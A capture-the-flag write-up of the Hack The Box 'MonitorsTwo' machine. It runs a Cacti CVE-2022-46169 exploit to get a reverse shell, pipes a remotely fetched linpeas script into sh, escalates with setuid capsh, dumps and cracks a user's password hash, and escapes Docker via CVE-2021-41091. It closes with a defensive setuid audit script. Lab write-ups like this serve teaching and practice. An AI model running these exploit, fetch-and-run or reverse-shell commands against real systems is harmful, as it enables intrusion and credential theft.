MonitorsTwo


Machine: Linux

Level: easy

Information gathering

nmap

 ┌──(root㉿kali)-[/home/kali/Pentest_script/git-dumper-master]
 └─# nmap -sV -sC 10.10.11.211                      
 Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-25 03:48 EDT
 Nmap scan report for 10.10.11.211
 Host is up (0.15s latency).
 Not shown: 998 closed tcp ports (reset)
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
 |   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
 |_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
 80/tcp open  http    nginx 1.18.0 (Ubuntu)
 |_http-server-header: nginx/1.18.0 (Ubuntu)
 |_http-title: Login to Cacti
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 63.80 seconds

Manual verification

Port 80

The site shows a login page with the version string 1.2.22 | (c) 2004-2023 - The Cacti Group. This version is affected by CVE-2022-46169.

Exploitation

When we try to log in normally it fails, so getting a shell must not require authentication. A search turns up an RCE exploit for the CVE.

Reverse shell

 ┌──(root㉿kali)-[/home/kali/Desktop]
 └─# python CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.47 --LPORT=1234
 Checking...
 The target is vulnerable. Exploiting...
 Bruteforcing the host_id and local_data_ids
 Bruteforce Success!!
 ┌──(root㉿kali)-[/home/kali/Pentest_script/git-dumper-master]
 └─# nc -lnvp 1234
 listening on [any] 1234 ...
 connect to [10.10.14.47] from (UNKNOWN) [10.10.11.211] 44144
 bash: cannot set terminal process group (1): Inappropriate ioctl for device
 bash: no job control in this shell
 bash-5.1$

Privilege escalation inside Docker

After getting a shell, start a Python web server on the attacking machine, fetch linpeas.sh onto the target and run it:

 curl http://10.10.14.47/linpeas.sh | sh
 Files with Interesting Permissions                
      
 strace Not Found                                                             
 -rwsr-xr-x 1 root root 87K Feb  7  2020 /usr/bin/gpasswd                     
 -rwsr-xr-x 1 root root 63K Feb  7  2020 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
 -rwsr-xr-x 1 root root 52K Feb  7  2020 /usr/bin/chsh
 -rwsr-xr-x 1 root root 58K Feb  7  2020 /usr/bin/chfn  --->  SuSE_9.3/10
 -rwsr-xr-x 1 root root 44K Feb  7  2020 /usr/bin/newgrp  --->  HP-UX_10.20
 -rwsr-xr-x 1 root root 31K Oct 14  2020 /sbin/capsh
 -rwsr-xr-x 1 root root 55K Jan 20  2022 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
 -rwsr-xr-x 1 root root 35K Jan 20  2022 /bin/umount  --->  BSD/Linux(08-1996)
 -rwsr-xr-x 1 root root 1.2M Mar 27  2022 /bin/bash
 -rwsr-xr-x 1 root root 71K Jan 20  2022 /bin/su

The setuid bits on capsh and bash look like room for privilege escalation; GTFOBins lists a method for capsh:

 pwd
 /sbin
 bash-5.1$ /sbin/capsh --gid=0 --uid=0 --
 ./capsh --gid=0 --uid=0 --
 whoami
 root

With that we are root, but clearly this is not the way out of Docker. We need to enumerate further. We enumerate the Cacti database, since the database host and credentials are already in hand:

 mysql --host=db --user=root --password=root cacti -e "show tables"

Running this command lists a number of tables, but the one we want is user_auth, because it holds something special:

 mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

We find a hash for a new user, which is very interesting:

|  4 | marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |     0 | Marcus Brune   |

Cracking the hash with john yields funkymonkey:

┌──(root㉿kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pwd.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?)     
1g 0:00:00:44 DONE (2023-07-25 05:41) 0.02235g/s 190.7p/s 190.7c/s 190.7C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
┌──(root㉿kali)-[~]
└─# john pwd.txt --show
?:funkymonkey

Getting a shell as marcus

Logging in to the target over SSH with the credentials above succeeds; the login banner says there is mail:

┌──(root㉿kali)-[~]
└─# ssh marcus@10.10.11.211

You have mail.
Last login: Tue Jul 25 08:28:45 2023 from 10.10.14.70
marcus@monitorstwo:/var/mail$ cat /var/mail/marcus 
From: administrator@monitorstwo.htb
To: all@monitorstwo.htb
Subject: Security Bulletin - Three Vulnerabilities to be Aware Of

Dear all,

We would like to bring to your attention three vulnerabilities that have been recently discovered and should be addressed as soon as possible.

CVE-2021-33033: This vulnerability affects the Linux kernel before 5.11.14 and is related to the CIPSO and CALIPSO refcounting for the DOI definitions. Attackers can exploit this use-after-free issue to write arbitrary values. Please update your kernel to version 5.11.14 or later to address this vulnerability.

CVE-2020-25706: This cross-site scripting (XSS) vulnerability affects Cacti 1.2.13 and occurs due to improper escaping of error messages during template import previews in the xml_path field. This could allow an attacker to inject malicious code into the webpage, potentially resulting in the theft of sensitive data or session hijacking. Please upgrade to Cacti version 1.2.14 or later to address this vulnerability.

CVE-2021-41091: This vulnerability affects Moby, an open-source project created by Docker for software containerization. Attackers could exploit this vulnerability by traversing directory contents and executing programs on the data directory with insufficiently restricted permissions. The bug has been fixed in Moby (Docker Engine) version 20.10.9, and users should update to this version as soon as possible. Please note that running containers should be stopped and restarted for the permissions to be fixed.

We encourage you to take the necessary steps to address these vulnerabilities promptly to avoid any potential security breaches. If you have any questions or concerns, please do not hesitate to contact our IT department.

Best regards,

Administrator
CISO
Monitor Two
Security Team


The hint here is CVE-2021-41091.

Back in /home/marcus there is an exp.sh; running it shows:

marcus@monitorstwo:~$ ./exp.sh
[!] Vulnerable to CVE-2021-41091
[!] Now connect to your Docker container that is accessible and obtain root access !
[>] After gaining root access execute this command (chmod u+s /bin/bash)

Did you correctly set the setuid bit on /bin/bash in the Docker container? (yes/no): yes
[!] Available Overlay2 Filesystems:
/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
/var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

[!] Iterating over the available Overlay2 filesystems !
[?] Checking path: /var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged
[x] Could not get root access in '/var/lib/docker/overlay2/4ec09ecfa6f3a290dc6b247d7f4ff71a398d4f17060cdaf065e8bb83007effec/merged'

[?] Checking path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged
[?] If it didn't spawn a shell go to this path and execute './bin/bash -p'

[!] Spawning Shell
bash-5.1# exit

This tells us exactly how to escalate; we just follow it.

Privilege escalation

marcus@monitorstwo:~$ /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin/bash -p
bash-5.1# whoami
root
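Both escalations above rest on the same two conditions: a setuid binary that hands out a shell (capsh inside the container, bash in the overlay2 merged directory), and a path to it that an unprivileged user can traverse. The following POSIX shell audit is an added example, not code from this write-up or from exp.sh; a defender can run it against / inside a container image or against a /var/lib/docker/overlay2/<id>/merged directory on the host. The list of shell-yielding binaries (a selection from GTFOBins) and the output format are my own choices.

```shell
#!/bin/sh
# Added example, not part of the original write-up or of exp.sh.
# Usage: audit_suid /path/to/root
# Output, one line per setuid file:  <flag> <reachability> <path>
#   flag         = SHELL_ESCAPE if the binary gives a shell once setuid, else expected
#   reachability = reachable if every directory below the audit root has o+x

# Setuid binaries that hand out a shell directly (selection from GTFOBins;
# capsh and bash are the two the write-up used).
SHELL_SUID_LIST="bash sh dash capsh env find python python3 perl"

# Succeed if every directory strictly between ROOT ($2) and FILE ($1) has the
# "other" execute bit, i.e. an unprivileged user can walk down to the file.
traversable_by_others() {
    p=$(dirname "$1")
    while [ "$p" != "$2" ] && [ "$p" != "/" ] && [ "$p" != "." ]; do
        mode=$(stat -c %a "$p")            # e.g. 755, 1777, 700
        case "${mode#"${mode%?}"}" in      # last octal digit = "other" bits
            1|3|5|7) ;;
            *) return 1 ;;
        esac
        p=$(dirname "$p")
    done
    return 0
}

audit_suid() {
    root=${1%/}
    [ -n "$root" ] || root=/
    find "$root" -type f -perm -4000 2>/dev/null | while IFS= read -r f; do
        flag=expected
        for s in $SHELL_SUID_LIST; do
            if [ "$(basename "$f")" = "$s" ]; then flag=SHELL_ESCAPE; fi
        done
        reach=reachable
        traversable_by_others "$f" "$root" || reach=not_reachable_by_others
        printf '%s %s %s\n' "$flag" "$reach" "$f"
    done
}
```

Any SHELL_ESCAPE line is a finding on its own; a SHELL_ESCAPE line that is also reachable, under a Docker data directory, is the exact situation the mail's CVE-2021-41091 notice warns about.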